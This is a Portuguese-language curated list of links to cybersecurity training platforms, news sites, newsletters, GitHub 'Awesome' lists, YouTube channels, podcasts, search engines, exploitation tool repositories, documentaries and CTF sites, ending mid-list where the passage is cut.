[Advanced Cyber Analytics](https://www.coursera.org/articles/cybersecurity-analyst-job-guide) - [Vulnerability Management](https://www.ukcybersecuritycouncil.org.uk/qualifications-and-careers/careers-route-map/vulnerability-management/) - [Industrial Control Systems](https://ianmartin.com/careers/177380-industrial-control-system-ics-engineer/) - [Privacy and Data Protection](https://resources.infosecinstitute.com/topic/data-privacy-careers-which-path-is-right-for-you/) - [Data Protection Officer (DPO)](https://www.michaelpage.com.hk/advice/job-description/technology/data-protection-officer) - [Penetration Testing Engineer](https://onlinedegrees.sandiego.edu/vulnerability-and-penetration-testing/) - [Security and Risk Assessment](https://learn.org/articles/What_are_Some_Career_Options_in_Security_Risk_Assessment.html) - [Identity and Acess Management](https://identitymanagementinstitute.org/identity-and-access-management-career-and-jobs/#:~:text=Identity%20and%20access%20management%20career%20and%20jobs%20involve%20protecting%20systems,mechanism%20and%20have%20the%20appropriate) - [Software Development Security](https://cybersecurityguide.org/careers/security-software-developer/#:~:text=A%20security%20software%20developer%20is,written%20and%20verbal%20communication%20skills.) - [Offensive Security (Red Team)](https://careers.mitre.org/us/en/job/R107322/Offensive-Security-Red-Team-Developer) - [Defensive Security (Blue Team)](https://www.csnp.org/post/a-career-in-defensive-security-blue-team#:~:text=What%20is%20the%20Blue%20team,all%20the%20security%20measures%20applied.) - [Incident Handling And Analysis](https://www.ziprecruiter.com/Career/Incident-Response-Analyst/What-Is-How-to-Become) - [Introsuion Detection and Prevention](https://www.spiceworks.com/it-security/vulnerability-management/articles/what-is-idps/#:~:text=An%20intrusion%20detection%20and%20prevention,administrator%20and%20prevent%20potential%20attacks.) - [Information Security Governance](https://www.ukcybersecuritycouncil.org.uk/qualifications-and-careers/careers-route-map/cyber-security-governance-risk-management/) - [Security Frameworks and Standards](https://www.linkedin.com/pulse/overview-cyber-security-frameworks-standards-tommy/) - [Security Architecture and Design](https://www.infosectrain.com/blog/roles-and-responsibilities-of-a-security-architect/#:~:text=A%20Security%20Architect%20creates%2C%20plans,%2C%20cybersecurity%2C%20and%20risk%20management.) ## 🕵️‍♂️ Sites para estudar Cyber Security - [HackXpert](https://hackxpert.com/) - Laboratórios e treinamentos gratuitos. - [TryHackMe](https://tryhackme.com/) - Exercícios práticos e laboratórios. - [CyberSecLabs](https://www.cyberseclabs.co.uk/) - Laboratórios de treinamento de alta qualidade. - [Cybrary](https://www.cybrary.it/) - Vídeos, laboratórios e exames práticos. - [LetsDefend](https://letsdefend.io/) - Plataforma de treinamento da blue team. - [Root Me](https://www.root-me.org/) - Mais de 400 desafios de cyber security. - [RangeForce](https://www.rangeforce.com/) - Plataforma interativa e prática. - [Certified Secure](https://www.certifiedsecure.com/frontpage) - Muitos desafios diferentes. - [Vuln Machines](https://www.vulnmachines.com/) - Cenários do mundo real para praticar. - [Try2Hack](https://try2hack.me/) - Jogue um jogo baseado nos ataques reais. - [TCM Security](https://academy.tcm-sec.com/) - Cursos de nível básico para cyber security. - [EchoCTF](https://echoctf.red/) - Treine suas habilidades ofensivas e defensivas. - [Hack The Box](https://www.hackthebox.com/) - Plataforma online de treinamento em cyber security. - [Vuln Hub](https://www.vulnhub.com/) - Material para experiência prática. - [OverTheWire](https://overthewire.org/wargames/) - Aprenda conceitos de segurança por meio de desafios. - [PentesterLab](https://pentesterlab.com/) - Aprenda testes de penetração de aplicativos da web. - [PortSwigger Web Security Academy](https://portswigger.net/web-security) - Amplo material didático. ## 📰 Sites de noticias de Cyber Security - [Bleeping Computer](https://www.bleepingcomputer.com/) - [Malwarebytes Blog](https://www.malwarebytes.com/blog) - [IT Security Guru](https://www.itsecurityguru.org/) - [Security Weekly](https://securityweekly.com/) - [The Hacker News](https://thehackernews.com/) - [Infosecurity Magazine](https://www.infosecurity-magazine.com/) - [CSO Online](https://www.csoonline.com/) - [The State of Security - Tripwire](https://www.tripwire.com/state-of-security/) - [The Last Watchdog](https://www.lastwatchdog.com/) - [Naked Security](https://nakedsecurity.sophos.com/) - [Graham Cluley](https://grahamcluley.com/) - [Cyber Magazine](https://cybermagazine.com/) - [WeLiveSecurity](https://www.welivesecurity.com/br/) - [Dark Reading](https://www.darkreading.com/) - [Threatpost](https://threatpost.com/) - [Krebs on Security](https://krebsonsecurity.com/) - [Help Net Security](https://www.helpnetsecurity.com/) - [HackRead](https://www.hackread.com/) - [SearchSecurity](https://www.techtarget.com/searchsecurity/) - [TechWorm](https://www.techworm.net/category/security-news) - [GBHackers On Security](https://gbhackers.com/) - [The CyberWire](https://thecyberwire.com/) - [Cyber Defense Magazine](https://www.cyberdefensemagazine.com/) - [Hacker Combat](https://hackercombat.com/) - [Cybers Guards](https://cybersguards.com/) - [Cybersecurity Insiders](https://www.cybersecurity-insiders.com/) - [Information Security Buzz](https://informationsecuritybuzz.com/) - [The Security Ledger](https://securityledger.com/) - [Security Gladiators](https://securitygladiators.com/) - [Infosec Land](https://pentester.land/) - [Cyber Security Review](https://www.cybersecurity-review.com/) - [Comodo News](https://blog.comodo.com/) - [Internet Storm Center | SANS](https://isc.sans.edu/) - [Daniel Miessler](https://danielmiessler.com/) - [TaoSecurity](https://www.taosecurity.com/) - [Reddit](https://www.reddit.com/search/?q=Security%20news) - [All InfoSec News](https://allinfosecnews.com/) - [CVE Trends](https://cvetrends.com/) - [Securibee](https://securib.ee/) - [threatABLE](https://www.threatable.io/) - [Troy Hunt Blog](https://www.troyhunt.com/) - [Errata Security](https://blog.erratasec.com/) ## 📃 Newsletters de Cyber Security - [API Security Newsletter](https://apisecurity.io/) - Notícias e vulnerabilidades de segurança da API. - [Blockchain Threat Intelligence](https://newsletter.blockthreat.io/) - Ferramentas, eventos, ameaças. - [We Live Security](https://www.welivesecurity.com/br/) - Notícias, visualizações e insights premiados. - [SecPro](https://www.thesec.pro/) - Análise de ameaças, ataques e tutoriais. - [Gov Info Security](https://www.govinfosecurity.com/) - Notícias governamentais de segurança cibernética nacionais e internacionais. - [Threatpost](https://threatpost.com/newsletter-sign/) - Exploits, vulnerabilidades, malware e segurança cibernética. - [AWS Security Digest](https://awssecuritydigest.com/) - Atualizações de segurança da AWS. - [Krebs On Security](https://krebsonsecurity.com/subscribe/) - Jornalismo investigativo de segurança cibernética que é interessante. - [Risky Biz](https://risky.biz/subscribe/) - Análise de grandes histórias cibernéticas. - [Unsupervised Learning Community](https://danielmiessler.com/newsletter/) - Histórias importantes de segurança cibernética. - [Schneier on Security](https://www.schneier.com/) - Notícias e opiniões sobre segurança cibernética. - [CyberSecNewsWeekly](https://buttondown.email/CybersecNewsWeekly) - Coleção de notícias, artigos e ferramentas. - [RTCSec](https://www.rtcsec.com/newsletter/) - Notícias sobre segurança VOIP e WebRTC. - [This Week in 4n6](https://thisweekin4n6.com/) - Atualizações do DFIR. - [Securibee Newsletter](https://securib.ee/newsletter/) - Notícias de segurança cibernética com curadoria. - [Shift Security Left](https://shift-security-left.curated.co/) - Segurança, arquitetura e incidentes de aplicativos. - [TripWire’s State of Security](https://www.tripwire.com/state-of-security/) - Notícias de segurança cibernética corporativa. - [Graham Cluley](https://grahamcluley.com/gchq-newsletter/) - Notícias e opiniões sobre segurança cibernética. - [Zero Day](https://zetter.substack.com/) - Histórias sobre hackers, espiões e crimes cibernéticos. - [The Hacker News](https://thehackernews.com/#email-outer) - Notícias de cibersegurança. - [CSO Online](https://www.csoonline.com/newsletters/signup.html) - Notícias, análises e pesquisas sobre segurança e gerenciamento de riscos. - [Naked Security](https://nakedsecurity.sophos.com/) - Como se proteger de ataques. - [AdvisoryWeek](https://advisoryweek.com/) - Resumos de consultoria de segurança dos principais fornecedores. - [tl;dr sec Newsletter](https://tldrsec.com/) - Ferramentas, posts em blogs, conferências e pesquisas. ## 🗃️ Awesome Hacking - [Awesome Hacking](https://github.com/Hack-with-Github/Awesome-Hacking) - [Awesome Honeypots](https://github.com/paralax/awesome-honeypots) - [Awesome Incident Response](https://github.com/meirwah/awesome-incident-response) - [Awesome Malware Analysis](https://github.com/rshipp/awesome-malware-analysis) - [Awesome Red Teaming](https://github.com/yeyintminthuhtut/Awesome-Red-Teaming) - [Awesome Security](https://github.com/sbilly/awesome-security) - [Awesome Privacy](https://github.com/Lissy93/awesome-privacy) - [Awesome Darknet](https://github.com/DarknetList/awesome-darknet) - [Awesome Tor](https://github.com/ajvb/awesome-tor) - [Awesome Mobile Security](https://github.com/vaib25vicky/awesome-mobile-security) - [Awesome Penetration Testing](https://github.com/enaqx/awesome-pentest) - [Awesome Pentesting Bible](https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE) - [Awesome Hacking Amazing Project](https://github.com/carpedm20/awesome-hacking) - [Awesome Pentest Tools](https://github.com/gwen001/pentest-tools) - [Awesome Forensic Tools](https://github.com/ivbeg/awesome-forensicstools) - [Awesome Android Security](https://github.com/ashishb/android-security-awesome) - [Awesome AppSec](https://github.com/paragonie/awesome-appsec) - [Awesome Asset Discovery](https://github.com/redhuntlabs/Awesome-Asset-Discovery) - [Awesome Bug Bounty](https://github.com/djadmin/awesome-bug-bounty) - [Awesome CTF](https://github.com/apsdehal/awesome-ctf) - [Awesome Cyber Skills](https://github.com/joe-shenouda/awesome-cyber-skills) - [Awesome DevSecOps](https://github.com/devsecops/awesome-devsecops) - [Awesome Embedded and IoT Security](https://github.com/fkie-cad/awesome-embedded-and-iot-security) - [Awesome Exploit Development](https://github.com/FabioBaroni/awesome-exploit-development) - [Awesome Fuzzing](https://github.com/secfigo/Awesome-Fuzzing) - [Awesome Hacking Resources](https://github.com/vitalysim/Awesome-Hacking-Resources) - [Awesome Industrial Control System](https://github.com/hslatman/awesome-industrial-control-system-security) - [Awesome Infosec](https://github.com/onlurking/awesome-infosec) - [Awesome IoT Hacks](https://github.com/nebgnahz/awesome-iot-hacks) - [Awesome Mainframe Hacking](https://github.com/samanL33T/Awesome-Mainframe-Hacking) - [Awesome OSINT](https://github.com/jivoi/awesome-osint) - [Awesome macOS and iOS Security Related Tools](https://github.com/ashishb/osx-and-ios-security-awesome) - [Awesome PCAP Tools](https://github.com/caesar0301/awesome-pcaptools) - [Awesome PHP](https://github.com/ziadoz/awesome-php) - [Awesome Reversing](https://github.com/tylerha97/awesome-reversing) - [Awesome Reinforcement Learning for Cyber Security](https://github.com/Limmen/awesome-rl-for-cybersecurity) - [Awesome Security Talks](https://github.com/PaulSec/awesome-sec-talks) - [Awesome Serverless Security](https://github.com/puresec/awesome-serverless-security/) - [Awesome Social Engineering](https://github.com/v2-dev/awesome-social-engineering) - [Awesome Threat Intelligence](https://github.com/hslatman/awesome-threat-intelligence) - [Awesome Vehicle Security](https://github.com/jaredthecoder/awesome-vehicle-security) - [Awesome Vulnerability Research](https://github.com/sergey-pronin/Awesome-Vulnerability-Research) - [Awesome Web Hacking](https://github.com/infoslack/awesome-web-hacking) - [Awesome Advanced Windows Exploitation References](https://github.com/yeyintminthuhtut/Awesome-Advanced-Windows-Exploitation-References) - [Awesome Wifi Arsenal](https://github.com/0x90/wifi-arsenal) - [Awesome YARA](https://github.com/InQuest/awesome-yara) - [Awesome Browser Exploit](https://github.com/Escapingbug/awesome-browser-exploit) - [Awesome Linux Rootkits](https://github.com/milabs/awesome-linux-rootkits) - [Awesome API Security](https://github.com/arainho/awesome-api-security/) ## 🔗 Testes de segurança de API > Cursos, videos, artigos, blogs, podcast sobre testes de segurança de API em Português - [Segurança em APIs REST](https://blog.mandic.com.br/artigos/seguranca-em-apis-rest-parte-1/) - [Segurança de APIs - Red Hat](https://www.redhat.com/pt-br/topics/security/api-security) - [Segurança de API: 5 melhores práticas para controlar riscos](https://www.bry.com.br/blog/seguranca-de-api/) - [O que é Segurança de API](https://minutodaseguranca.blog.br/o-que-e-seguranca-de-api/) > Cursos, videos, artigos, blogs, podcast sobre testes de segurança de API em Inglês - [Traceable AI, API Hacking 101](https://www.youtube.com/watch?v=qC8NQFwVOR0&ab_channel=Traceable) - [Katie Paxton-Fear, API Hacking](https://www.youtube.com/watch?v=qC8NQFwVOR0&ab_channel=Traceable) - [Bad API, hAPI Hackers! by jr0ch17](https://www.youtube.com/watch?v=UT7-ZVawdzA&ab_channel=Bugcrowd) - [OWASP API Security Top 10 Webinar](https://www.youtube.com/watch?v=zTkv_9ChVPY&ab_channel=42Crunch) - [How to Hack APIs in 2021](https://labs.detectify.com/2021/08/10/how-to-hack-apis-in-2021/) - [Let's build an API to hack](https://hackxpert.com/blog/API-Hacking-Excercises/Excercises%207e5f4779cfe34295a0d477a12c05ecbd/Let's%20build%20an%20API%20to%20hack%20-%20Part%201%20The%20basics%2007599097837a4f539104b20376346b7e.html) - [Bugcrowd, API Security 101 - Sadako](https://www.youtube.com/watch?v=ijalD2NkRFg&ab_channel=Bugcrowd) - [David Bombal, Free API Hacking Course](https://www.youtube.com/watch?v=CkVvB5woQRM&ab_channel=DavidBombal) - [How To Hack API In 60 Minutes With Open Source Tools](https://www.wallarm.com/what/how-to-hack-api-in-60-minutes-with-open-source) - [APIsecurity IO, API Security Articles](https://apisecurity.io/) - [The API Security Maturity Model](https://curity.io/resources/learn/the-api-security-maturity-model/) - [API Security Best Practices MegaGuide](https://expeditedsecurity.com/api-security-best-practices-megaguide/) - [API Security Testing Workshop - Grant Ongers](https://www.youtube.com/watch?v=l0ISDMUpm68&ab_channel=StackHawk) - [The XSS Rat, API Testing And Securing Guide](https://www.youtube.com/playlist?list=PLd92v1QxPOprsg5fTjGBApq4rpb0G-N8L) - [APIsec OWASP API Security Top 10: A Deep Dive](https://www.apisec.ai/blog/what-is-owasp-api-security-top-10) - [We Hack Purple, API Security Best Practices](https://www.youtube.com/watch?v=F9CN0NE93Qc&ab_channel=WeHackPurple) - [Kontra Application Security, Owasp Top 10 for API](https://application.security/free/owasp-top-10-API) - [OWASP API Top 10 CTF Walk-through](https://securedelivery.io/articles/api-top-ten-walkthrough/) - [How To Hack An API And Get Away With It](https://smartbear.com/blog/api-security-testing-how-to-hack-an-api-part-1/) - [Ping Identity, API Security: The Complete Guide 2022](https://www.pingidentity.com/en/resources/blog/post/complete-guide-to-api-security.html) - [Analyzing The OWASP API Security Top 10 For Pen Testers](https://www.youtube.com/watch?v=5UTHUZ3NGfw&ab_channel=SANSOffensiveOperations) - [Finding and Exploiting Unintended Functionality in Main Web App APIs](https://bendtheory.medium.com/finding-and-exploiting-unintended-functionality-in-main-web-app-apis-6eca3ef000af) - [API Security: The Complete Guide to Threats, Methods & Tools](https://brightsec.com/blog/api-security/) ## 🎥 Canais do Youtube - [Mente binária](https://www.youtube.com/c/PapoBin%C3%A1rio) - Contéudo geral sobre Cyber Security - [Guia Anônima](https://www.youtube.com/user/adsecf) - Contéudo geral sobre Cyber Security - [Hak5](https://www.youtube.com/c/hak5) - Contéudo geral sobre Cyber Security - [The XSS rat](https://www.youtube.com/c/TheXSSrat) - Tudo sobre Bug Bounty - [ITProTV](https://www.youtube.com/c/ItproTv) - Contéudo geral sobre Cyber Security - [Infosec](https://www.youtube.com/c/InfoSecInstitute) - Conscientização sobre Cyber Security - [Cyrill Gössi](https://www.youtube.com/channel/UCp1rLlh9AQN9Pejzbg9dcAg) - Vídeos de criptografia. - [DC CyberSec](https://www.youtube.com/c/DCcybersec) - Contéudo geral sobre Cyber Security - [Black Hat](https://www.youtube.com/c/BlackHatOfficialYT) - Conferências técnicas de cibersegurança. - [David Bombal](https://www.youtube.com/c/DavidBombal) - Tudo relacionado à segurança cibernética. - [Outpost Gray](https://www.youtube.com/c/OutpostGray) - Desenvolvimento de carreira em segurança cibernética. - [Bugcrowd](https://www.youtube.com/c/Bugcrowd) - Metodologias de Bug Bounty e entrevistas. - [Network Chuck](https://www.youtube.com/c/NetworkChuck) - Tudo relacionado à segurança cibernética. - [Professor Messer](https://www.youtube.com/c/professormesser) - Guias cobrindo certificações. - [Cyberspatial](https://www.youtube.com/c/Cyberspatial) - Educação e treinamento em segurança cibernética. - [OWASP Foundation](https://www.youtube.com/c/OWASPGLOBAL) - Conteúdo de segurança de aplicativos da Web. - [Nahamsec](https://www.youtube.com/c/Nahamsec) - Vídeos educativos sobre hackers e bug bounty. - [Computerphile](https://www.youtube.com/user/Computerphile) - Abrange conceitos e técnicas básicas. - [InfoSec Live](https://www.youtube.com/c/infoseclive) - Tudo, desde tutoriais a entrevistas. - [InsiderPHD](https://www.youtube.com/c/InsiderPhD) - Como começar a caçar bugs. - [Security Weekly](https://www.youtube.com/c/SecurityWeekly) - Entrevistas com figuras de segurança cibernética. - [Hack eXPlorer](https://www.youtube.com/c/HackeXPlorer) - Tutoriais gerais, dicas e técnicas. - [Cyber CDH](https://www.youtube.com/c/cybercdh) - Ferramentas, táticas e técnicas de segurança cibernética. - [John Hammond](https://www.youtube.com/c/JohnHammond010) - Análise de malware, programação e carreiras. - [SANS Offensive Operations](https://www.youtube.com/c/SANSOffensiveOperations) - Vídeos técnicos de segurança cibernética. - [13Cubed](https://www.youtube.com/c/13cubed) - Vídeos sobre ferramentas, análise forense e resposta a incidentes. - [HackerSploit](https://www.youtube.com/c/HackerSploit) - Teste de penetração, hacking de aplicativos da web. - [Z-winK University](https://www.youtube.com/channel/UCDl4jpAVAezUdzsDBDDTGsQ) - Educação e demonstrações de bug bountys. - [Peter Yaworski](https://www.youtube.com/c/yaworsk1) - Dicas e entrevistas de hacking de aplicativos da Web. - [IppSec](https://www.youtube.com/c/ippsec) - Laboratórios e tutoriais de capture the flag, HackTheBox etc. - [Pentester Academy TV](https://www.youtube.com/c/PentesterAcademyTV) - Discussões e ataques demonstrativos. - [BlackPerl](https://www.youtube.com/c/BlackPerl) - Análise de malware, análise forense e resposta a incidentes. - [Offensive Security](https://www.youtube.com/c/OffensiveSecurityTraining) - Conteúdo educacional e orientações de laboratório. - [Day Cyberwox](https://www.youtube.com/c/DayCyberwox) - Conteúdo útil de segurança na nuvem e orientações. - [DEFCONConference](https://www.youtube.com/user/DEFCONConference) - Tudo do evento de segurança cibernética DEF CON. - [STÖK](https://www.youtube.com/c/STOKfredrik) - Vídeos sobre ferramentas, análise de vulnerabilidades e metodologia. - [MalwareTechBlog](https://www.youtube.com/c/MalwareTechBlog)- Conteúdo de segurança cibernética e engenharia reversa. - [The Hated One](https://www.youtube.com/c/TheHatedOne) - Pesquisa que explica as concepções de segurança cibernética. - [Simply Cyber](https://www.youtube.com/c/GeraldAuger) - Ajuda as pessoas com o desenvolvimento de carreira de segurança cibernética. - [Black Hills Information Security](https://www.youtube.com/c/BlackHillsInformationSecurity) - Contéudo geral sobre Cyber Security - [Security Now](https://www.youtube.com/c/securitynow) - Notícias de crimes cibernéticos, hackers e segurança de aplicativos da web. - [The Cyber Mentor](https://www.youtube.com/c/TheCyberMentor) - Hacking ético, hacking de aplicativos da web e ferramentas. - [Joe Collins](https://www.youtube.com/user/BadEditPro) - Tudo relacionado ao Linux, incluindo tutoriais e guias. - [Null Byte](https://www.youtube.com/c/NullByteWHT) - Segurança cibernética para hackers éticos e cientistas da computação. - [LiveOverflow](https://www.youtube.com/c/LiveOverflow) - Envolve hacking, vídeos de gravação e capture the flags. - [The PC Security Channel](https://www.youtube.com/c/thepcsecuritychannel) - Segurança do Windows, notícias sobre malware e tutoriais. ## 🔎 Ferramentas de busca - [Dehashed](https://www.dehashed.com/) - Veja as credenciais vazadas. - [SecurityTrails](https://securitytrails.com/) - Extensos dados de DNS. - [DorkSearch](https://dorksearch.com/) - Google dorking muito rápido. - [ExploitDB](https://www.exploit-db.com/) - Arquivo de vários exploits. - [ZoomEye](https://www.zoomeye.org/) - Reúna informações sobre alvos. - [Pulsedive](https://pulsedive.com/) - Procure por inteligência de ameaças. - [GrayHatWarfare](https://grayhatwarfare.com/) - Pesquise buckets S3 públicos. - [PolySwarm](https://polyswarm.io/) - Verifique arquivos e URLs em busca de ameaças. - [Fofa](http://fofa.so/) - Procure por várias inteligências de ameaças. - [LeakIX](https://leakix.net/) - Pesquise informações indexadas publicamente. - [DNSDumpster](https://dnsdumpster.com/) - Pesquise registros DNS rapidamente. - [FullHunt](https://fullhunt.io/) - Superfícies de ataque de pesquisa e descoberta. - [AlienVault](https://otx.alienvault.com/) - Pesquise e descubra sobre ataques de surfaces. - [ONYPHE](https://www.onyphe.io/) - Amplo feed de inteligência de ameaças. - [Grep App](https://grep.app/) - Coleta dados de inteligência de ameaças cibernéticas. - [URL Scan](https://urlscan.io/) - Pesquise em meio milhão de repositórios git. - [Vulners](https://vulners.com/) - Serviço gratuito para digitalizar e analisar sites. - [WayBackMachine](https://archive.org/web/) - Visualize o conteúdo de sites excluídos. - [Shodan](https://www.shodan.io/) - Procure dispositivos conectados à internet. - [Netlas](https://netlas.io/) - Pesquise e monitore ativos conectados à Internet. - [CRT sh](https://crt.sh/) - Procure por certificados que foram registrados pelo CT. - [Wigle](https://www.wigle.net/) - Banco de dados de redes sem fio, com estatísticas. - [PublicWWW](https://publicwww.com/) - Pesquisa de marketing e marketing de afiliados. - [Binary Edge](https://www.binaryedge.io/) - Verifica a Internet em busca de inteligência de ameaças. - [GreyNoise](https://www.greynoise.io/) - Procure dispositivos conectados à internet. - [Hunter](https://hunter.io/) - Pesquise endereços de e-mail pertencentes a um site. - [Censys](https://censys.io/) - Avaliando a superfície de ataque para dispositivos conectados à Internet. - [IntelligenceX](https://intelx.io/) - Pesquise Tor, I2P, vazamentos de dados, domínios e e-mails. - [Packet Storm Security](https://packetstormsecurity.com/) - Navegue pelas vulnerabilidades e explorações mais recentes. - [SearchCode](https://searchcode.com/) - Pesquise 75 bilhões de linhas de código de 40 milhões de projetos. ## 📱 Ferramentas de Mobile - [Mobile Security Framework](https://github.com/MobSF/Mobile-Security-Framework-MobSF) - [Hacker 101](https://github.com/Hacker0x01/hacker101) - [Objection Runtime Mobile Exploration](https://github.com/sensepost/objection) - [Wire iOS](https://github.com/wireapp/wire-ios) - [Drozer](https://github.com/WithSecureLabs/drozer) - [Needle](https://github.com/WithSecureLabs/needle) ## 🎤 Podcasts de Cyber Security - [Cyber Work](https://www.infosecinstitute.com/podcast/) - [Click Here](https://therecord.media/podcast/) - [Defrag This](https://open.spotify.com/show/6AIuefXVoa6XXriNo4ZAuF) - [Security Now](https://twit.tv/shows/security-now) - [InfoSec Real](https://www.youtube.com/channel/UC2flvup7giBpysO-4wdynMg/featured) - [InfoSec Live](https://www.youtube.com/c/infoseclive) - [Simply Cyber](https://www.simplycyber.io/podcast) - [OWASP Podcast](https://owasp.org/www-project-podcast/) - [We Talk Cyber](https://monicatalkscyber.com/) - [Risky Business](https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q) - [Malicious Life](https://malicious.life/) - [Hacking Humans](https://thecyberwire.com/podcasts/hacking-humans) - [What The Shell](https://open.spotify.com/show/3QcBl6Yf1E3rLdz3UJEzOM) - [Life of a CISO](https://open.spotify.com/show/3rn3xiUMELnMtAPHMOebx2) - [H4unt3d Hacker](https://thehauntedhacker.com/podcasts) - [2 Cyber Chicks](https://www.itspmagazine.com/2-cyber-chicks-podcast) - [The Hacker Mind](https://thehackermind.com/) - [Security Weekly](https://securityweekly.com/) - [Cyberside Chats](https://open.spotify.com/show/6kqTXF20QV3gphPsikl1Uo) - [Darknet Diaries](https://darknetdiaries.com/) - [CyberWire Daily](https://thecyberwire.com/podcasts/daily-podcast) - [Absolute AppSec](https://absoluteappsec.com/) - [Security in Five](https://securityinfive.libsyn.com/) - [The Cyber Queens](https://www.cyberqueenspodcast.com/) - [Smashing Security](https://www.smashingsecurity.com/) - [401 Access Denied](https://delinea.com/events/podcasts) - [7 Minute Security](https://7minsec.com/) - [8th Layer Insights](https://thecyberwire.com/podcasts/8th-layer-insights) - [Adopting Zero Trust](https://open.spotify.com/show/5hrfiDWuthYUQwj7wyIMzI) - [Cyber Crime Junkies](https://cybercrimejunkies.com/) - [Dr Dark Web Podcast](https://www.cybersixgill.com/resources/podcast/) - [Cyber Security Sauna](https://www.withsecure.com/en/whats-new/podcasts) - [The Cyberlaw Podcast](https://www.lawfareblog.com/topic/cyberlaw-podcast) - [Unsupervised Learning](https://open.spotify.com/show/0cIzWAEYacLz7Ag1n1YhUJ) - [Naked Security Podcast](https://nakedsecurity.sophos.com/podcast/) - [Identity at the Center](https://www.identityatthecenter.com/) - [Breaking Down Security](https://www.brakeingsecurity.com/) - [The Shellsharks Podcast](https://shellsharks.com/podcast) - [The Virtual CISO Moment](https://virtual-ciso.us/) - [The Cyber Ranch Podcast](https://hackervalley.com/cyberranch/) - [The Cyber Tap (cyberTAP)](https://cyber.tap.purdue.edu/cybertap-podcast/) - [The Shared Security Show](https://sharedsecurity.net/) - [The Social-Engineer Podcast](https://open.spotify.com/show/6Pmp3DQKUDW6DXBlnGpxkH) - [The 443 Security Simplified](https://www.secplicity.org/category/the-443/) - [Adventures of Alice and Bob](https://www.beyondtrust.com/podcast) - [Cybersecurity Today by ITWC](https://open.spotify.com/show/2YiPcnkJLIcxtQ04nCfaSu) - [Crypto-Gram Security Podcast](https://crypto-gram.libsyn.com/) - [Open Source Security Podcast](https://opensourcesecurity.io/category/podcast/) - [Hacker Valley Studio Podcast](https://hackervalley.com/) - [The Hacker Chronicles Podcast](https://www.tenable.com/podcast/hacker-chronicles) - [BarCode Cybersecurity Podcast](https://thebarcodepodcast.com/) - [Task Force 7 Cyber Security Radio](https://www.tf7radio.com/) - [The Privacy, Security, & OSINT Show](https://inteltechniques.com/podcast.html) - [Cyber Security Headlines by the CISO Series](https://cisoseries.com/category/podcast/cyber-security-headlines/) - [SANS Internet Stormcenter Daily Cyber Podcast](https://podcasts.apple.com/us/podcast/sans-internet-stormcenter-daily-cyber-security-podcast/id304863991) ## 📽️ Palestras - [Hardware Hacking e Bad USB - Leonardo La Rosa](https://www.youtube.com/watch?v=s25Fw69u9tM&ab_channel=MeninadeCybersec) - [Atribuições de Ataques na Visão de Cyber Threat Intelligence - Robson Silva](https://www.youtube.com/watch?v=JallvQuZXZA&ab_channel=MeninadeCybersec) - [Defesa Cibernética - Milena Barboza](https://youtu.be/Sc1VQkN3xiw) - [DevSecOps Desenvolvimento Seguro - Michelle Mesquita](https://youtu.be/_ngBWBkq6wA) - [Linguagem de Baixo Nível, Assembly e binários - Carolina Trigo](https://youtu.be/CL51I8xzzf8) - [Segurança Ofensiva, Red Team e GRC - João Góes](https://youtu.be/q_moH0u9cFE) - [Como se manter hacker num mundo de segurança - Thauan Santos](https://youtu.be/uo3STUx5mMk) - [Hardware Hacking, Vulnerabilidades em RFID e NFC - Davi Mikael](https://youtu.be/zTv7JZpO-IA) - [Como se tornar um Hacker em um mundo de script kiddies - Rafael Sousa](https://youtu.be/veFyCTv5i3g) - [Black Hat Python - Hacking, Programação e Red Team - Joas Antonio](https://youtu.be/EOulWqLHmjo) - [Python 101 - André Castro](https://youtu.be/AGxleHdhY8Q) - [Engenharia Social e Humand Hacking - Marina Ciavatta](https://youtu.be/7mj2i2E5QMI) - [Certificações em Cibersegurança - Fábio Augusto](https://youtu.be/b7Pwl3RGo9E) - [Mobile Security - Oryon Farias](https://youtu.be/oMmzSbaj3Gk) ## 🃏 CheatSheets - [Kali Linux Cheatsheets](https://www.comparitech.com/net-admin/kali-linux-cheat-sheet/) - [Python Cheatsheets](https://www.pythoncheatsheet.org/) - [Linux Command Line Cheatsheets](https://cheatography.com/davechild/cheat-sheets/linux-command-line/) - [Nmap Cheatsheets](https://www.stationx.net/nmap-cheat-sheet/) - [Red Team Cheatsheets](https://0xsp.com/offensive/red-team-cheatsheet/) - [Blue Team Cheatsheets](https://guidance.ctag.org.uk/blue-team-cheatsheet) - [Pentesting Cheatsheets](https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets) ## ♟️ Exploitation - [Exploitation Tools](https://github.com/nullsecuritynet/tools) - [SSRFmap](https://github.com/swisskyrepo/SSRFmap) - [Fuxploider](https://github.com/almandin/fuxploider) - [Explotation Windows](https://github.com/Hack-with-Github/Windows) ## 🎬 Documentários - [We Are Legion – The Story Of The Hacktivists](https://lnkd.in/dEihGfAg) - [The Internet’s Own Boy: The Story Of Aaron Swartz](https://lnkd.in/d3hQVxqp) - [Hackers Wanted](https://lnkd.in/du-pMY2R) - [Secret History Of Hacking](https://lnkd.in/dnCWU-hp) - [Def Con: The Documentary](https://lnkd.in/dPE4jVVA) - [Web Warriors](https://lnkd.in/dip22djp) - [Risk (2016)](https://lnkd.in/dMgWT-TN) - [Zero Days (2016)](https://lnkd.in/dq_gZA8z) - [Guardians Of The New World (Hacking Documentary) | Real Stories](https://lnkd.in/dUPybtFd) - [A Origem dos Hackers](https://lnkd.in/dUJgG-6J) - [The Great Hack](https://lnkd.in/dp-MsrQJ) - [The Networks Dilemma](https://lnkd.in/dB6rC2RD) - [21st Century Hackers](https://lnkd.in/dvdnZkg5) - [Cyber War - Dot of Documentary](https://lnkd.in/dhNTBbbx) - [CyberWar Threat - Inside Worlds Deadliest Cyberattack](https://lnkd.in/drmzKJDu) - [The Future of Cyberwarfare](https://lnkd.in/dE6_rD5x) - [Dark Web Fighting Cybercrime Full Hacking](https://lnkd.in/dByEzTE9) - [Cyber Defense: Military Training for Cyber Warfare](https://lnkd.in/dhA8c52h) - [Hacker Hunter: WannaCry The History Marcus Hutchin](https://lnkd.in/dnPcnvSv) - [The Life Hacker Documentary](https://lnkd.in/djAqBhbw) - [Hacker The Realm and Electron - Hacker Group](https://lnkd.in/dx_uyTuT) ## 🚩 Capture the Flag - [Hacker 101](https://www.hackerone.com/hackers/hacker101) - [PicoCTF](https://picoctf.org/) - [TryHackMe](https://tryhackme.com) - [HackTheBox](https://www.hackthebox.com/) - [VulnHub](https://www.vulnhub.com/) - [HackThisSite](https://hackthissite.org/) - [CTFChallenge](https://ctfchallenge.co.uk/) - [Attack-Defense](https://attackdefense.com/) - [Alert to win](https://alf.nu/alert1) - 